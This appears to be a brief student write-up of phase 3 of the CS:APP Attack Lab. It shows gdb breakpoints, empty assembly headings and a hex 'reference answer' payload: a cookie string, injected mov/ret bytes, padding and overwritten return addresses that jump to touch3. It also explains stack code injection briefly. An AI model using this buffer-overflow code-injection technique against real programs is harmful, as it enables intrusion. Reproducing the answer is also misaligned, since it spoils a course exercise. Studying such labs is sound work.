csapp attack lab phase3

csapp attack lab phase3

(gdb) b *0x401971
Breakpoint 1 at 0x401971: file visible.c, line 92.
(gdb) b *0x401976
Breakpoint 2 at 0x401976: file /usr/include/x86_64-linux-gnu/bits/stdio2.h, line 105.
(gdb) b *0x4017af
Breakpoint 3 at 0x4017af: file buf.c, line 14.
(gdb) b *0x4017b4
Breakpoint 4 at 0x4017b4: file buf.c, line 16.
(gdb) b *0x4017bd
Breakpoint 5 at 0x4017bd: file buf.c, line 16.
1
2
3
4
5
6
7
8
9
10

test 汇编代码:

getbuf汇编代码:

touch3汇编代码:

参考答案:

35 39 62 39 39 37 66 61 00 /* "59b997fa" */
48 c7 c7 78 dc 61 55 /* mov */
c3 /* ret */
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 /* match buf */
81 dc 61 55 00 00 00 00 /* mov address */
fa 18 40 00 00 00 00 00 /* touch3 address */
1
2
3
4
5
6
7
8

通过将touch3函数覆盖test的stack frame, 在40个字符的范围内写入汇编代码，使寄存器执行mov等指令，并跳转到touch3。
mov指令不能直接修改rip寄存器的值。因为rip寄存器存储的是指令的地址，它是由处理器自动更新的。